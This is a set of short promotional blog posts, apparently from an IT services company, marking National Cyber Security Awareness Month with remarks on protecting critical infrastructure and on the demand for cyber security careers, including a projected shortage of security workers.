Protecting your infrastructure requires constant vigilance and attention to evolving cyber attacks. Risk is inherent in everything we do, so trying to stay ahead of the cyber security curve is key. Our team of security experts can help you build a security strategy to detect, protect, and react to the complete threat lifecycle. The threats we all need to manage today evolve quickly, and we can help you minimize your risk and maximize your defenses to improve your cyber resiliency. For some expert insight on securing your critical infrastructure, give us a call and discover the Connection difference.

The post NCSAM, Week Five: Protecting Critical Infrastructure appeared first on Connected.

The New Security Reality

It’s week 4 of National Security Awareness Month (NCSAM). Each week of NCSAM is dedicated to a specific cybersecurity theme. The theme this week is “The Internet Wants YOU: Consider a Career in Cyber Security.”

With the continuous state of change in the global threat landscape, organizations face cyber attacks and security breaches that are growing in frequency and sophistication every day. But now, consider this: according to a study by the Center for Cyber Safety and Education, there will be a shortage of 1.8 million information security workers by 2022. This gap should be of great concern to organizations.

Skilled people make the difference in protecting sensitive data, so it’s more critical than ever that organizations begin to attract and retain the cybersecurity talent needed to defend against the evolving threat landscape. At Connection, we help inspire individuals coming out of universities to engage in co-op or intern-related opportunities, and I strongly encourage other organizations to see what they can do to help young people today who are really interested in building their skills in this area.

The figures don’t lie. The demand for cyber security will only continue to grow. Through local collaborative efforts between employers, training providers, and community leaders, we can ensure individuals have the opportunity to build on their tech knowledge and participate in a secure, thriving economy.

The post The New Security Reality appeared first on Connected.

Cyber Security Careers Are in High Demand

October is National Cyber Security Awareness Month, which is an annual campaign to raise awareness about the importance of cyber security. Week 4 of NCSAM is all about the growing field of cyber security and why you might want to consider this career.

It’s impossible to overstate the importance of security in today’s digital world. Cyber attacks are growing in frequency and sophistication every day, and a key risk to our economy and security is the lack of professionals to protect our growing networks. According to a study by the Center for Cyber Safety and Education, by 2022, there will be a shortage of 1.8 million information security workers. So, it’s critical that that we begin now to prepare our students—and any others who are interested in making a career move—to fill these gaps. Many colleges and universities have developed information assurance programs that help technical, security-minded students achieve a great foundation in this industry. We also challenge corporations to offer intern and co-op opportunities for students in these degree programs, so they can see what security looks like in practical, business-world applications.

Connection is committed to promoting cyber security and online safety. Join Connection during Week 4 of NCSAM, as we explore cyber security as a viable and rewarding profession and encourage people from all backgrounds to see information security as an essential career path.

Read this next:

 

The post Cyber Security Careers Are in High Demand appeared first on Connected.